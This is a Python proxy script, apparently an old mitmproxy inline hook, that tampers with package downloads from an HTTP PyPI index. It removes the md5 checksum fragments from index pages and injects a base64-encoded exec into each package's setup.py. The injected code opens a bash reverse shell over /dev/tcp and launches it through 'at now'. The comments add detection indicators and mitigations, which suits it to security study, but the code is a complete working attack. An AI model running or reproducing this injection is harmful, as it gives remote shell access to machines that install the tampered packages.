pip_intercept.py
# -*- coding: utf-8 -*-
#
 
import tempfile
import sys, os
import re
 
# Address and port the injected command calls back to. The values shown are a
# loopback placeholder; the port is kept as a string because it is only ever
# %-formatted into the command text below.
LHOST, LPORT = ('127.0.0.1', '4444')
 
# PAYLOAD is a string of Python source, not a callable: a single os.system()
# call that pipes a bash one-liner into `at now`, so the command is run by the
# at scheduler rather than as a child of the process that evaluates the string.
# The one-liner opens /dev/tcp/LHOST/LPORT on file descriptor 76 and attaches
# sh's stdin, stdout and stderr to it.
# Detection points on a host that evaluated this string: an at job created by
# the user that ran the package install, a bash/sh process whose descriptors
# point at a /dev/tcp socket, and an outbound connection that starts during or
# just after a package installation.
PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s;
sh <&76 >&76 2>&76\'" | at now 2>/dev/null')''' % (LHOST, LPORT))
 
# The literal above spans two source lines; drop the embedded newline so the
# statement is a single line of text.
PAYLOAD = PAYLOAD.replace('\n', '')
 
 
# Proxy response hook. The (context, flow) signature and the flow.request /
# flow.response accessors look like an old mitmproxy inline script - confirm
# against the proxy version in use. The listing lost its indentation when it
# was extracted, so the nesting of the statements below is inferred, not shown.
#
# What it demonstrates: a package index reached over plain HTTP gives an
# on-path proxy control over both the checksum and the archive, and a source
# distribution's setup.py runs as code on the installing machine.
# Mitigations: fetch the index over HTTPS with certificate verification, and
# pin digests in the requirements file and install with `--require-hashes`.
# Pinned digests do not come from the index page, so removing the page's
# fragment does not disable them.
# Indicators in a tampered archive: a line of the form
# `exec ("<base64>".decode("base64"))` directly above `setup(` in setup.py,
# and an archive digest that differs from the published one.
def response(context, flow):
# Responses without a Content-Type header are returned unmodified.
if not 'Content-Type' in flow.response.headers:
return None
 
# Index pages are matched on an http:// (not https://) URL prefix. The regex
# deletes every `#md5=<hex>` link fragment from the page body; that fragment
# is the checksum the installer would otherwise compare the archive against.
if flow.request.get_url().startswith('http://pypi.python.org/simple/'):
flow.response.content = re.sub(r'#md5=[a-f0-9]+', '', flow.response.content)
 
# Archive downloads: first Content-Type value is application/octet-stream and
# the request host is pypi.python.org. Presumably everything below is the body
# of this condition - the original indentation is not visible here.
if flow.response.headers['Content-Type'][0] == 'application/octet-stream'\
and flow.request.host == 'pypi.python.org':
 
# Work in a fresh temporary directory. os.chdir() changes the working
# directory of the whole proxy process, and nothing below removes the directory.
tmp_dir = tempfile.mkdtemp()
os.chdir(tmp_dir)
 
# Local file name = last path component of the requested URL.
filename = flow.request.get_path_components()[-1]
 
# Save the original archive body; the file object is never closed explicitly.
open(filename, 'wb').write(flow.response.content)
 
# Unpack into ./extracted with aunpack (atool). filename is concatenated into
# the shell command line without quoting.
os.mkdir('extracted')
os.system('aunpack -X '+tmp_dir+'/extracted '+filename)
 
# For every setup.py found under the temp dir, sed inserts one line before each
# line matching `setup(`: an exec of the base64-encoded PAYLOAD string.
# str.encode('base64') and the inserted .decode("base64") are Python 2 codecs.
os.system(r'''find . -iname setup.py | xargs sed -i '/setup(/ i\exec ("%'''
'''s".decode("base64"))' ''' %
PAYLOAD.encode('base64').replace('\n', ''))
 
# Repack the modified tree under the original file name; apack -f overwrites
# the archive that was saved above.
os.chdir('extracted')
os.system('apack -f ../%s *' % filename)
 
# Replace the response body with the repacked archive. The client receives
# different bytes under the same file name, which is the change a pinned
# digest would catch.
flow.response.content = open('../%s' % filename, 'rb').read()
